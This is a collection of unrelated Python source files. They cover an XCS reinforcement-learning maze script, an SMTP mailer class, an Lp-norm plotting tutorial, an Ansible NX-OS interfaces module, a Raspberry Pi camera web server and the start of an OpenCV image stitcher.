[7,5],
[8,5],
[9,5],
[16,5],
[15,5],
[14,5],
[13,5],
[12,5],
[11,5],
[10,5],
[1,6],
[2,6],
[3,6],
[4,6],
[5,6],
[6,6],
[7,6],
[8,6],
[9,6],
[16,6],
[15,6],
[14,6],
[13,6],
[12,6],
[11,6],
[10,6],
[1,7],
[2,7],
[3,7],
[4,7],
[5,7],
[6,7],
[7,7],
[8,7],
[9,7],
[16,7],
[15,7],
[14,7],
[13,7],
[12,7],
[11,7],
[10,7],
[1,8],
[2,8],
[3,8],
[4,8],
[5,8],
[6,8],
[7,8],
[8,8],
[9,8],
[10,8],
[11,8],
[12,8],
[13,8],
[14,8],
[15,8],
[16,8]
]
maze2= [
[1,1],
[2,1],
[3,1],
[4,1],
[1,2],
[2,2],
[3,2],
[4,2],
[1,3],
[2,3],
[3,3],
[4,3],
[4,4],
[5,4],
[7,4],
[8,4],
[4,5],
[5,5],
[6,5],
[7,5],
[8,5],
[9,5]
]
# def state():
# return ''.join(['0' if numpy.random.rand() > 0.5 else '1' for i in range(0, bits + 2**bits)])
interm = {'done':False}
# seed = 5
import logging
# create logger with 'spam_application'
logger = logging.getLogger('moxcsnonGym')
logger.setLevel(logging.DEBUG)
# create file handler which logs even debug messages
fh = logging.FileHandler('./data/moxcsnonGym.log')
fh.setLevel(logging.DEBUG)
# create console handler with a higher log level
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
# create formatter and add it to the handlers
formatter = logging.Formatter('%(asctime)s - ## %(message)s')
fh.setFormatter(formatter)
ch.setFormatter(formatter)
# add the handlers to the logger
logger.addHandler(fh)
logger.addHandler(ch)
# set_global_seeds(seed)
# def getstate(observation):
# pos, vel = observation
# pos_bin = int(np.digitize(pos, pos_space))
# vel_bin = int(np.digitize(vel, vel_space))
# return stateToCondition_gray(pos_bin,vel_bin)
def stateToCondition_binary(pos_bin,vel_bin):
left = '{:05b}'.format(pos_bin)
right = '{:05b}'.format(vel_bin)
condition = left + right
return condition
# def stateToCondition_gray(pos_bin,vel_bin):
# left_gray = GrayCode(5)
# right_gray = GrayCode(5)
# left_binary = '{:05b}'.format(pos_bin)
# right_binary = '{:05b}'.format(vel_bin)
# left_gray = graycode.bin_to_gray(left_binary)
# right_gray = graycode.bin_to_gray(right_binary)
# condition = left_gray + right_gray
# return condition
#todo: matrix(1024 1024 3) to coindition
# def stateToCondition(matrix):
# left = getInformation(0)
# right = getInformation(1)
# up = getInformation(2)
# down = getInformation(3)
# return left+right+up+down
#todo:get information from matrix
# class InferenceConfig(det.DetConfig):
# # Set batch size to 1 since we'll be running inference on
# # one image at a time. Batch size = GPU_COUNT * IMAGES_PER_GPU
# GPU_COUNT = 1
# IMAGES_PER_GPU = 1
# inf_config = InferenceConfig('obj', ['obj','player_obj', 'monster_obj', 'step_obj', 'wall_obj'])
def stateToCodution(conditionChar):
#maze1 A:001 S:010 .:100 $:101 %:110 1:111, T:011, N:000, need all 8
#maze2 A:001 S:010 .:100 $:101 %:110 1:111, T:011, #:000, need STA.#1,
#TODO: # TO N
# maze2 A:001 S:010 .:100 $:101 %:110 1:111, T:011, N:000, need STA.N1
# print("conditionChar[i]")
# print(conditionChar)
condition = list()
for i in range(len(conditionChar)):
# print(conditionChar[i])
if conditionChar[i].decode()=='A':
condition.append('001')
elif conditionChar[i].decode()=='S':
condition.append('010')
elif conditionChar[i].decode()=='.':
condition.append('100')
elif conditionChar[i].decode() == '$':
condition.append('101')
elif conditionChar[i].decode()=='%':
condition.append('110')
elif conditionChar[i].decode() == 'T':
condition.append('011')
elif conditionChar[i].decode()=='N':
condition.append('000')
else:
condition.append('111')
return condition
"""
solve mountain car problem, car move on the right
"""
def eop(done):
return done
"""
Calculates the reward for performing the action in the given state
"""
# def reward(state, action):
# #Extract the parts from the state
# address = state[:bits]
# data = state[bits:]
# #Check the action
# if str(action) == data[int(address, 2)]:
# return rho
# else:
# return 0
""
def initalize():
done = False
firstCondition = env.getFirstCondition()
state = stateToCodution(firstCondition)
return state
""
def reward(state, action):
obs_next, reward, done, info, condition = env.step(action)
interm.done = done
return reward, obs_next, condition
def trainingTestingWeight_separate(weight):
# set_global_seeds(seed)
#training
for j in range(learning_problems):
# for each step
# my_xcs.run_experiment()
# my_xcs.run_experiment_seperate()
logger.debug("iteration:%d, learning problems: %d"%(context['iteration'], j))
my_xcs.run_iteration_episode(j, weight)
# output
#print("output*****action")
my_xcs.stateAction(weight[0])
# Testing
this_correct = 0
# dataframe=[]
for j in range(validation_problems):
# rand_state = getstate()
# this_correct = this_correct + reward(rand_state, my_xcs.classify(rand_state))
#print("learning problems: ", j)
print("start to test")
print(j)
# if j<1:
resultList=my_xcs.run_testing_episode(weight, j)
dataframe.append(resultList)
dataframe = pd.DataFrame({'validation problem': j, 'result': resultList})
print("dataframe")
print(dataframe)
# 将DataFrame存储为csv,index表示是否显示行名,default=True
filename = "resultList.csv"
dataframe.to_csv(filename, index=True, sep=',')
# else:
# my_xcs.run_testing_episode(weight[0], j)
#print("Performance1 " + ": " + str((this_correct / validation_problems / rho) * 100) + "%");
#backup
# currx_training=14
# currx_testing=4
# non_markov_block_training=18
# non_markov_block_testing=3
currx_training=5
currx_testing=5
non_markov_block_training=4
non_markov_block_testing=4
def trainingTestingWeight(Allweight,ideaPoint, neighboursize, iteration, TestingInterval):
#training
my_xcs.emptyPopulation()
setup_utils.setup_and_load(environment=env_seed)
env = make('standard', num_envs=num_envs, curr_x=currx_training, non_markov_block=non_markov_block_training)
env._max_episode_steps = 1000
nenvs = Config.NUM_ENVS
total_timesteps = int(256e6)
df = pd.DataFrame(columns=['currentweight', 'result', 'stays', 'validationproblem','inteval', 'reward'])
for j in range(learning_problems):
setup_utils.setup_and_load(environment=env_seed)
logger.debug("iteration:%i, learning problems: %d"%(context['iteration'], j))
#env1=--run-id myrun --num-levels 1 --set-seed 1
my_xcs.run_iteration_episode(j, Allweight,ideaPoint, neighboursize)
print("testing j:", j)
# output
# print("output population")
# #todo:print later
# #for weight in Allweight:
# print(len(my_xcs.population))
if j>1 and (j+1)%TestingInterval==0:
print("testing: ",j)
# my_xcs.print_population()
# Testing
setup_utils.setup_and_load(environment='1')
nenvs = Config.NUM_ENVS
env = make('standard', num_envs=num_envs, curr_x=currx_testing,non_markov_block=non_markov_block_testing)
env._max_episode_steps = 1000
resultAllweight=[]
validationproblem=[]
currentweight=[]
stays=[]
inteval=[]
rewList=[]
for i in range(validation_problems):
# rand_state = getstate()
# this_correct = this_correct + reward(rand_state, my_xcs.classify(rand_state))
logger.debug("iteration:%d, learning problems: %d"%(context['iteration'], j))
for weight in Allweight:
# if j<1:
# actionList=my_xcs.run_testing_episode(weight, j)
# dataframe = pd.DataFrame({'actionList': actionList})
#
# # 将DataFrame存储为csv,index表示是否显示行名,default=True
# filename = "iteration_%d_actionList_%s.csv"%(context['iteration'], str(weight))
# dataframe.to_csv(filename, index=False, sep=',')
# else:
# my_xcs.run_testing_episode(weight, j)
# env2=--run-id myrun --num-levels 1 --set-seed 5
resultList, stay, rew = my_xcs.run_testing_episode(weight, i, iteration)
resultAllweight.append(resultList)
validationproblem.append(i)
currentweight.append(weight)
stays.append(stay)
inteval.append(j)
rewList.append(rew)
# df=df.append(pd.DataFrame({'currentweight': weight, 'result': resultList,'stays':stay,'validationproblem':i,'inteval':inteval}),ignore_index=True)
dataframe = pd.DataFrame({'currentweight': currentweight, 'result': resultAllweight,'stays':stays,'validationproblem':i,'inteval':j,'reward':rewList})
df=df.append(dataframe, ignore_index=True)
filename = "result_" + "interation_" +str(iteration) + ".csv"
df.to_csv(filename, index=False, sep=',')
# return dataframe
#logger.debug("iteration:%d, Performance1: %s%"%(context['iteration'], str((this_correct / validation_problems / rho) * 100) ))
setup_utils.setup_and_load(environment =env_seed)
# set_global_seeds(seed)
env = make('standard', num_envs=num_envs, curr_x=currx_training, non_markov_block=non_markov_block_training)
env._max_episode_steps = 1000
nenvs = Config.NUM_ENVS
total_timesteps = int(256e6)
# save_interval = args.save_interval
# Set some parameters
parameters = moxcs.parameter()
# parameters.state_length = 10
parameters.state_length = 24
parameters.num_actions =7
parameters.p_hash = 0.01
parameters.theta_mna = 7
parameters.e0 = 1000 * 0.01
parameters.theta_ga = 800000
parameters.gamma = 0.99
# parameters.gamma = 0.99
parameters.N = 8000000
parameters.beta = 0.1
parameters.initial_error0 = 0.01
parameters.initial_fitness0 = 0.01
parameters.initial_prediction0 = 0.0
parameters.initial_error1 = 0.01
parameters.initial_fitness1 = 0.01
parameters.initial_prediction1 = 0.0
#todo: new parameters
parameters.state_length = 24 # The number of bits in the state
parameters.num_actions=7
parameters.bitRange = 3
parameters.bits = 24
# Construct an XCS instance
context = {'iteration': 1, 'logger': logger}
my_xcs = moxcs.moxcs(parameters, stateToCodution, reward, eop, initalize, context, env)
md = moeadMethod(2, 3, (-10, -10))
# 2 obj, 11weights
Allweights = md.initailize(2, 3)
# reAllweights=list(reversed(Allweights))
weights = [[[1, 0]], [[0, 1]]]
def main():
positions = maze2
print("aaaaaaaaaaa")
# result=[]
for iteration in range(0,30):
# context['iteration'] = iteration
#todo:population is wrong with paraters.state_length
#population = my_xcs.generate_population([[1, 0]],positions)
population = my_xcs.allHashClassifier([[1, 0]])#weights, bits:多少位, range:每一位取值
# print("population")
trainingTestingWeight([[1,0],[0,1]], [1000, 1000], 1, iteration,interval)
# with open('resultlist', 'w', newline='') as myfile:
# wr = csv.writer(myfile, quoting=csv.QUOTE_ALL)
# wr.writerow(result)
if __name__ == '__main__':
main()
|
<reponame>invenia/mailer
"""
The Mailer class provides a simple way to send emails.
"""
from __future__ import absolute_import
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import os
from smtplib import SMTP
import six
_ENCODING = 'utf-8'
class Mailer(object):
"""
The Mailer class provides a simple way to send emails.
"""
def __init__(self, username, password, host='smtp.gmail.com:587'):
self._username = username
self._password = password
self._host = host
self._server = None
def open(self):
"""
Open the mail server for sending messages
"""
self._server = SMTP(self._host)
self._server.starttls()
self._server.login(self._username, self._password)
def close(self):
"""
Close the mail server
"""
self._server.close()
self._server = None
def is_open(self):
"""
Checks whether the connection to the mail server is open
"""
return self._server is not None
def __enter__(self):
self.open()
return self
def __exit__(self, exc_type, exc_value, traceback):
if self.is_open():
self.close()
# I'm fine with the number of arguments
# pylint: disable-msg=R0913
def send(self, recipients, subject, body, mail_as=None, cc_recipients=None,
bcc_recipients=None, attachments=None):
"""
Send an email message.
recipients: either an email address, or a list of email
addresses of the direct recipients of the message.
subject: the header of the message
body: the message body
mail_as: an alias to use for sending the message. If None,
the username for logging into the server is used.
Default: None
cc_recipients: either an email address, or a list of email
addresses of all recipients who are to be receive
Carbon Copies of the message. Default: None
bcc_recipients: either an email address, or a list of email
addresses of all recipients who are to be receive
Blind Carbon Copies of the message. Default: None
attachments: either a filepath, or list of filepaths of all
files that should be added to the message as
attachments. Default: None
"""
if isinstance(recipients, six.string_types):
recipients = [recipients]
if mail_as is None:
mail_as = self._username
if cc_recipients is None:
cc_recipients = []
elif isinstance(cc_recipients, six.string_types):
cc_recipients = [cc_recipients]
if bcc_recipients is None:
bcc_recipients = []
elif isinstance(bcc_recipients, six.string_types):
bcc_recipients = [bcc_recipients]
if attachments is None:
attachments = []
elif isinstance(attachments, six.string_types):
attachments = [attachments]
message = build_message_string(recipients, subject, body, mail_as,
cc_recipients, bcc_recipients,
attachments)
all_recipients = recipients + cc_recipients + bcc_recipients
self._server.sendmail(mail_as, all_recipients, message)
# pylint: enable-msg=R0913
# pylint: disable-msg=R0913
def build_message_string(recipients, subject, body, sender, cc_recipients=None,
bcc_recipients=None, attachments=None):
"""
Build an email message.
NOTE: It's recommended that you use the Mailer object to accomplish
this. besides handling (interfacing) smtp, it also alllows fuller
defaults.
recipients: a list of email addresses of the direct recipients.
subject: the header of the message
body: the message body
mail_as: an alias to use for sending the message. If None,
the username for logging into the server is used.
Default: None
cc_recipients: a list of email addresses of all recipients who are
to be receive Carbon Copies of the message.
Default: None
bcc_recipients: a list of email addresses of all recipients who are
to be receive Blind Carbon Copies of the message.
Default: None
attachments: a list of filepaths of all files that should be added
to the message as attachments. Default: None
"""
subject = subject.encode(_ENCODING)
message = MIMEText(body.encode(_ENCODING), _charset=_ENCODING)
if attachments:
full_message = MIMEMultipart()
full_message.attach(message)
message = full_message
for attachment in attachments:
application = MIMEApplication(open(attachment, 'rb').read())
application.add_header('Content-Disposition', 'attachment',
filename=os.path.basename(attachment))
message.attach(application)
message['Subject'] = subject
message['From'] = sender
message['To'] = _format_addresses(recipients)
if cc_recipients:
message['Cc'] = _format_addresses(cc_recipients)
if bcc_recipients:
message['Bcc'] = _format_addresses(bcc_recipients)
return message.as_string()
# pylint: enable-msg=R0913
def _format_addresses(addresses):
"""
build an address string from a list of addresses
"""
return ', '.join(addresses).encode(_ENCODING)
|
<filename>Code_Python/ch3_1_4_norm.py
### ch3.1.4 Lpノルムの作図
#%%
# 3.1.4項で利用するライブラリ
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.animation import FuncAnimation
#%%
## Lpノルムの作図
# 値を指定
p = 1
# wの値を指定
w_vals = np.arange(-10.0, 10.1, 0.1)
# 作図用のwの点を作成
W1, W2 = np.meshgrid(w_vals, w_vals)
# Lpのノルムを計算
Lp = (np.abs(W1)**p + np.abs(W2)**p)**(1.0 / p)
#%%
# Lpノルムの3Dグラフを作成
fig = plt.figure(figsize=(8, 8))
ax = fig.add_subplot(projection='3d') # 3D用の設定
ax.plot_surface(W1, W2, Lp, cmap='jet') # 曲面図
ax.contour(W1, W2, Lp, cmap='jet', offset=0) # 等高線図
ax.set_xlabel('$w_1$')
ax.set_ylabel('$w_2$')
ax.set_zlabel('$||w||_p$')
ax.set_title('p=' + str(np.round(p, 1)), loc='left')
fig.suptitle('$||w||_p = {}^p\sqrt{\sum_{j=1}^M |w_j|^p}$')
#ax.view_init(elev=90, azim=270) # 表示アングル
plt.show()
#%%
# Lpノルムの2Dグラフを作成
plt.figure(figsize=(9, 8))
plt.contour(W1, W2, Lp, cmap='jet') # 等高線図
#plt.contour(W1, W2, Lp, cmap='jet', levels=1) # 等高線図:(値を指定)
#plt.contourf(W1, W2, Lp, cmap='jet') # 塗りつぶし等高線図
plt.xlabel('$w_1$')
plt.ylabel('$w_2$')
plt.title('p=' + str(np.round(p, 1)), loc='left')
plt.suptitle('$||w||_p = {}^p\sqrt{\sum_{j=1}^M |w_j|^p}$')
plt.colorbar(label='$||w||_p$')
plt.grid()
plt.gca().set_aspect('equal')
plt.show()
#%%
## 正則化項の作図
# 正則化項を計算
E_W = (np.abs(W1)**p + np.abs(W2)**p) / p
# 正則化項の3Dグラフを作成
fig = plt.figure(figsize=(8, 8))
ax = fig.add_subplot(projection='3d') # 3D用の設定
ax.plot_surface(W1, W2, E_W, cmap='jet') # 曲面図
ax.contour(W1, W2, E_W, cmap='jet', offset=0) # 等高線図
ax.set_xlabel('$w_1$')
ax.set_ylabel('$w_2$')
ax.set_zlabel('$E_W(w)$')
ax.set_title('p=' + str(np.round(p, 1)), loc='left')
fig.suptitle('$E_W(w) = \\frac{1}{p} \sum_{j=1}^M |w_j|^p$')
#ax.view_init(elev=90, azim=270) # 表示アングル
plt.show()
#%%
## pとグラフの形状の関係
# 使用するpの値を指定
p_vals = np.arange(0.1, 10.1, 0.1)
# 図を初期化
fig = plt.figure(figsize=(6, 6))
ax = fig.add_subplot(projection='3d') # 3D用の設定
fig.suptitle('Lp-Norm', fontsize=20)
# 作図処理を関数として定義
def update(i):
# 前フレームのグラフを初期化
plt.cla()
# i回目の値を取得
p = p_vals[i]
# Lpノルムを計算
Lp = (np.abs(W1)**p + np.abs(W2)**p)**(1.0 / p)
# Lpノルムの3Dグラフを作成
ax.plot_surface(W1, W2, Lp, cmap='jet') # 曲面図
ax.contour(W1, W2, Lp, cmap='jet', offset=0) # 等高線図
ax.set_xlabel('$w_1$')
ax.set_ylabel('$w_2$')
ax.set_zlabel('$||w||_p$')
ax.set_title('p=' + str(np.round(p, 1)), loc='left')
# gif画像を作成
anime_norm3d = FuncAnimation(fig, update, frames=len(p_vals), interval=100)
# gif画像を保存
anime_norm3d.save('PRML/Fig/ch3_1_4_LpNorm_3d.gif')
#%%
# 図を初期化
fig = plt.figure(figsize=(6, 6))
# 作図処理を関数として定義
def update(i):
# 前フレームのグラフを初期化
plt.cla()
# i回目の値を取得
p = p_vals[i]
# Lpノルムを計算
Lp = (np.abs(W1)**p + np.abs(W2)**p)**(1.0 / p)
# Lpノルムの2Dグラフを作成
plt.contour(W1, W2, Lp, cmap='jet') # 等高線図
#plt.contourf(W1, W2, Lp, cmap='jet') # 塗りつぶし等高線図
plt.xlabel('$w_1$')
plt.ylabel('$w_2$')
plt.title('p=' + str(np.round(p, 1)), loc='left')
plt.suptitle('Lp-Norm', fontsize=20)
plt.grid()
plt.axes().set_aspect('equal')
# gif画像を作成
anime_norm2d = FuncAnimation(fig, update, frames=len(p_vals), interval=100)
# gif画像を保存
anime_norm2d.save('PRML/Fig/ch3_1_4_LpNorm_2d.gif')
|
<filename>ansible/venv/lib/python2.7/site-packages/ansible/modules/network/nxos/nxos_interfaces.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright 2019 Red Hat
# GNU General Public License v3.0+
# (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
#############################################
# WARNING #
#############################################
#
# This file is auto generated by the resource
# module builder playbook.
#
# Do not edit this file manually.
#
# Changes to this file will be over written
# by the resource module builder.
#
# Changes should be made in the model used to
# generate this file or in the resource module
# builder template.
#
#############################################
"""
The module file for nxos_interfaces
"""
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'network'}
DOCUMENTATION = """
---
module: nxos_interfaces
version_added: 2.9
short_description: 'Manages interface attributes of NX-OS Interfaces'
description: This module manages the interface attributes of NX-OS interfaces.
author: <NAME> (@trishnaguha)
notes:
- Tested against NXOS 7.3.(0)D1(1) on VIRL
options:
config:
description: A dictionary of interface options
type: list
elements: dict
suboptions:
name:
description:
- Full name of interface, e.g. Ethernet1/1, port-channel10.
type: str
required: true
description:
description:
- Interface description.
type: str
enabled:
description:
- Administrative state of the interface.
Set the value to C(true) to administratively enable the interface
or C(false) to disable it
type: bool
speed:
description:
- Interface link speed. Applicable for Ethernet interfaces only.
type: str
mode:
description:
- Manage Layer2 or Layer3 state of the interface.
Applicable for Ethernet and port channel interfaces only.
choices: ['layer2','layer3']
type: str
mtu:
description:
- MTU for a specific interface. Must be an even number between 576 and 9216.
Applicable for Ethernet interfaces only.
type: str
duplex:
description:
- Interface link status. Applicable for Ethernet interfaces only.
type: str
choices: ['full', 'half', 'auto']
ip_forward:
description:
- Enable or disable IP forward feature on SVIs.
Set the value to C(true) to enable or C(false) to disable.
type: bool
fabric_forwarding_anycast_gateway:
description:
- Associate SVI with anycast gateway under VLAN configuration mode.
Applicable for SVI interfaces only.
type: bool
state:
description:
- The state of the configuration after module completion
type: str
choices:
- merged
- replaced
- overridden
- deleted
default: merged
"""
EXAMPLES = """
# Using merged
# Before state:
# -------------
#
# interface Ethernet1/1
# description testing
# mtu 1800
- name: Merge provided configuration with device configuration
nxos_interfaces:
config:
- name: Ethernet1/1
description: 'Configured by Ansible'
enabled: True
- name: Ethernet1/2
description: 'Configured by Ansible Network'
enabled: False
state: merged
# After state:
# ------------
#
# interface Ethernet1/1
# description Configured by Ansible
# no shutdown
# mtu 1800
# interface Ethernet2
# description Configured by Ansible Network
# shutdown
# Using replaced
# Before state:
# -------------
#
# interface Ethernet1/1
# description Interface 1/1
# interface Ethernet1/2
- name: Replaces device configuration of listed interfaces with provided configuration
nxos_interfaces:
config:
- name: Ethernet1/1
description: 'Configured by Ansible'
enabled: True
mtu: 2000
- name: Ethernet1/2
description: 'Configured by Ansible Network'
enabled: False
mode: layer2
state: replaced
# After state:
# ------------
#
# interface Ethernet1/1
# description Configured by Ansible
# no shutdown
# mtu 1500
# interface Ethernet2/2
# description Configured by Ansible Network
# shutdown
# switchport
# Using overridden
# Before state:
# -------------
#
# interface Ethernet1/1
# description Interface Ethernet1/1
# interface Ethernet1/2
# interface mgmt0
# description Management interface
# ip address dhcp
- name: Override device configuration of all interfaces with provided configuration
nxos_interfaces:
config:
- name: Ethernet1/1
enabled: True
- name: Ethernet1/2
description: 'Configured by Ansible Network'
enabled: False
state: overridden
# After state:
# ------------
#
# interface Ethernet1/1
# interface Ethernet1/2
# description Configured by Ansible Network
# shutdown
# interface mgmt0
# ip address dhcp
# Using deleted
# Before state:
# -------------
#
# interface Ethernet1/1
# description Interface Ethernet1/1
# interface Ethernet1/2
# interface mgmt0
# description Management interface
# ip address dhcp
- name: Delete or return interface parameters to default settings
nxos_interfaces:
config:
- name: Ethernet1/1
state: deleted
# After state:
# ------------
#
# interface Ethernet1/1
# interface Ethernet1/2
# interface mgmt0
# description Management interface
# ip address dhcp
"""
RETURN = """
before:
description: The configuration as structured data prior to module invocation.
returned: always
type: list
sample: >
The configuration returned will always be in the same format
of the parameters above.
after:
description: The configuration as structured data after module completion.
returned: when changed
type: list
sample: >
The configuration returned will always be in the same format
of the parameters above.
commands:
description: The set of commands pushed to the remote device.
returned: always
type: list
sample: ['interface Ethernet1/1', 'mtu 1800']
"""
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.network.nxos.argspec.interfaces.interfaces import InterfacesArgs
from ansible.module_utils.network.nxos.config.interfaces.interfaces import Interfaces
def main():
"""
Main entry point for module execution
:returns: the result form module invocation
"""
module = AnsibleModule(argument_spec=InterfacesArgs.argument_spec,
supports_check_mode=True)
result = Interfaces(module).execute_module()
module.exit_json(**result)
if __name__ == '__main__':
main()
|
<filename>server/rpi_cam/server.py
from aiohttp import web
from aiohttp_index import IndexMiddleware
import logging
import socketio
from rpi_cam.tools import get_logger, CLIENT_BUILD_DIR, CAM_DATA_DIR
from rpi_cam.capture import get_frame_manager, Drivers
from rpi_cam.capture.frame_manager import ImageError, DEFAULT_PREVIEW_RESOLUTION
from rpi_cam.capture.rpi_capture.picamera_options import DEFAULT_PREVIEW_SENSOR_MODE
class RPiCameraServer(object):
def __init__(self, driver=Drivers.RPI, frame_rate=24,
cam_data_dir=CAM_DATA_DIR, client_build_dir=CLIENT_BUILD_DIR,
log_level=logging.INFO,
shoot_at_startup=False,
preview_sensor_mode=DEFAULT_PREVIEW_SENSOR_MODE,
preview_resolution=DEFAULT_PREVIEW_RESOLUTION,
**web_app_args):
self.sio = socketio.AsyncServer()
self.logger = get_logger('rpi_cam.server', level=log_level, sio=self.sio, namespace='/cam')
self.app = web.Application(middlewares=[IndexMiddleware()])
self.sio.attach(self.app)
self.frame_rate = frame_rate
self.default_auto_shoot = False
self.auto_shoot = False
self.shoot_timeout = 5
self.clients = 0
self.idle_when_alone = True
self.report_timeout = 30
self.camera_idle_timeout = 5
self.camera_stop_task = None
self.shoot_at_startup = shoot_at_startup
self.startup_shooting_timeout = 300
self.latest_preview = None
self.frame_manager = get_frame_manager(
driver, cam_data_dir,
url_prefix='/cam_data',
logger=get_logger('rpi_cam.capture.frame_manager', level=log_level,
sio=self.sio, namespace='/cam'),
preview_sensor_mode=preview_sensor_mode,
preview_resolution=preview_resolution,
)
self.web_app_args = web_app_args
self.app.router.add_static('/cam_data', cam_data_dir, show_index=True)
self.app.router.add_get('/latest', self.get_latest_preview)
self.app.router.add_static('/', client_build_dir)
self.logger.warning('Starting background tasks.')
self.sio.start_background_task(self.stream_thumbs)
self.sio.start_background_task(self.auto_shoot_task)
self.sio.start_background_task(self.send_fps_updates)
self.sio.start_background_task(self.send_status_reports)
self.startup_shooting_task = self.sio.start_background_task(self.startup_shooting)
self._define_events()
def run(self):
self.logger.warning('Starting server with parameter set: {kwargs}.'.format(kwargs=self.web_app_args))
web.run_app(self.app, **self.web_app_args)
if self.frame_manager.is_started:
self.frame_manager.stop()
def _define_events(self):
@self.sio.on('update settings', namespace='/cam')
async def message(sid, data):
self.logger.warning('Updating camera settings to {settings}'.format(settings=data))
try:
self.frame_rate = int(data['frameRate'])
self.auto_shoot = bool(data['autoShoot'])
self.shoot_timeout = int(data['shootTimeout'])
self.idle_when_alone = bool(data['idleWhenAlone'])
self.report_timeout = int(data['reportTimeout'])
self.camera_idle_timeout = int(data['cameraIdleTimeout'])
except ValueError:
self.logger.error('Error updating camera settings to {settings}'.format(settings=data))
await self.send_camera_settings(sid)
@self.sio.on('shoot', namespace='/cam')
async def message(sid):
await self.shoot(sid)
@self.sio.on('connect', namespace='/cam')
async def connect(sid, environ):
self.logger.warning('Connection established: {sid} from {origin}.'.format(
sid=sid, origin=environ.get('HTTP_ORIGIN', 'unknown origin')
))
if not self.frame_manager.is_started:
self.logger.warning('Starting camera...')
self.frame_manager.start()
self.clients += 1
if self.camera_stop_task is not None:
self.logger.info('Cancelling postponed camera stop.')
self.camera_stop_task.cancel()
self.camera_stop_task = None
if self.startup_shooting_task is not None:
self.logger.info('Cancelling startup time lapse.')
self.startup_shooting_task.cancel()
self.startup_shooting_task = None
self.auto_shoot = self.default_auto_shoot
await self.send_camera_settings(sid)
self.logger.info('Initialising user with latest images.')
await self.send_latest_images_update(sid)
await self.send_status_report()
@self.sio.on('disconnect', namespace='/cam')
def disconnect(sid):
self.logger.warning('Disconnected: %s' % sid)
self.clients -= 1
if self.clients < 1 and self.frame_manager.is_started:
self.logger.warning('No more clients.')
if self.idle_when_alone:
self.stop_camera()
async def get_latest_preview(self, request):
if self.latest_preview is None:
await self.make_preview()
return web.json_response(self.latest_preview.__dict__)
def stop_camera(self):
if self.camera_idle_timeout > 0:
self.logger.warning('Closing camera...')
self.camera_stop_task = self.sio.start_background_task(self.postponed_camera_stop)
else:
self.logger.warning('Stop camera immediately...')
self.frame_manager.stop()
async def close_all_connections(self):
for sock in self.sio.eio.sockets.values():
await sock.close()
async def send_camera_settings(self, sid=None):
camera_setings = {
'frameRate': self.frame_rate,
'autoShoot': int(self.auto_shoot),
'shootTimeout': self.shoot_timeout,
'idleWhenAlone': int(self.idle_when_alone),
'reportTimeout': int(self.report_timeout),
'cameraIdleTimeout': int(self.camera_idle_timeout),
}
self.logger.info('Update user(s) with camera settings.')
await self.sio.emit('settings',
camera_setings,
sid=sid,
namespace='/cam')
async def send_latest_images_update(self, sid=None):
try:
await self.sio.emit('latest images',
[img.__dict__ for img in self.frame_manager.get_latest_images()],
sid=sid,
namespace='/cam')
except ImageError as e:
await self.logger.error(e)
async def send_status_report(self):
report = self.frame_manager.report_state()
# We do not send empty reports
if len(report) < 1:
return
if report['is_critical']:
self.logger.error(report['data'])
else:
self.logger.info(report['data'])
async def shoot(self, sid=None):
if not self.frame_manager.is_started:
self.logger.error('Trying to shoot from idle frame manager.')
return
try:
img = self.frame_manager.shoot()
if sid is not None and img is not None:
self.logger.debug('Sending update for recently shot image of {filename}'.format(filename=img.filename))
await self.sio.emit('image', img.__dict__, room=sid, namespace='/cam')
self.logger.debug('Sending latest images update.')
await self.send_latest_images_update()
self.logger.info('Successfully shot image: {filename}'.format(filename=img.filename))
except ImageError as e:
await self.logger.error(e)
def should_make_preview(self):
"""Determines whether preview should be taken and transferred to clients."""
return self.frame_manager.is_started and self.clients > 0
async def make_preview(self):
preview = self.frame_manager.preview()
self.latest_preview = preview
self.logger.debug('Sending frame update for {filename} preview'.format(filename=preview.filename))
await self.sio.emit('preview', preview.__dict__, namespace='/cam')
async def stream_thumbs(self):
"""Send new image notification to client."""
self.logger.debug('Starting thumbnail streaming background task.')
while True:
await self.sio.sleep(1 / self.frame_rate)
if self.should_make_preview():
await self.make_preview()
async def auto_shoot_task(self):
"""Perform periodic shoots."""
self.logger.debug('Starting auto shoot background task.')
while True:
if self.frame_manager.is_started and self.auto_shoot:
await self.shoot()
await self.sio.sleep(self.shoot_timeout)
async def send_fps_updates(self):
"""Perform periodic fps updates."""
self.logger.debug('Starting FPS update background task.')
while True:
await self.sio.sleep(1)
if self.frame_manager.is_started:
self.logger.debug('FPS: %s' % self.frame_manager.fps_counter.fps)
await self.sio.emit('fps', {'fps': self.frame_manager.fps_counter.fps}, namespace='/cam')
async def send_status_reports(self):
"""Sends periodic status reports to client."""
self.logger.debug('Starting camera reporting background task.')
while True:
await self.send_status_report()
await self.sio.sleep(self.report_timeout)
async def postponed_camera_stop(self):
"""Stops the camera after a certain time."""
self.logger.info('Entering postponed camera stop background task.')
time_to_stop = self.camera_idle_timeout
while self.frame_manager.is_started:
self.logger.info('Camera will stop after after {time_to_stop} seconds.'.format(time_to_stop=time_to_stop))
if time_to_stop <= 0:
self.frame_manager.stop()
self.logger.info('Camera stopped after {timeout} timeout.'.format(
timeout=self.camera_idle_timeout
))
time_to_stop -= 1
await self.sio.sleep(1)
async def startup_shooting(self):
"""Shoots certain time at the startup and then turn camera off."""
if not self.shoot_at_startup:
return
shooting_timeout = max([self.startup_shooting_timeout - self.camera_idle_timeout, 0])
self.logger.info('Info starting startup time lapse for {seconds} seconds.'.format(seconds=shooting_timeout))
self.auto_shoot = True
self.frame_manager.start()
await self.sio.sleep(shooting_timeout)
self.logger.info('Stopping startup time lapse...')
self.auto_shoot = self.default_auto_shoot
self.stop_camera()
def run(**kwargs):
server = RPiCameraServer(**kwargs)
server.run()
if __name__ == '__main__':
run()
|
<reponame>360ls/360ls-stitcher
"""
This module encapsulates the Stitcher class to enable stitching of images/frames.
"""
from __future__ import absolute_import, division, print_function
import numpy as np
import imutils
import cv2
class Stitcher(object):
""" Creates a single stitched frame from two frames """
def __init__(self):
""" Initializes homography matrix and checks opencv version """
self.isv3 = imutils.is_cv3()
self.homography = None
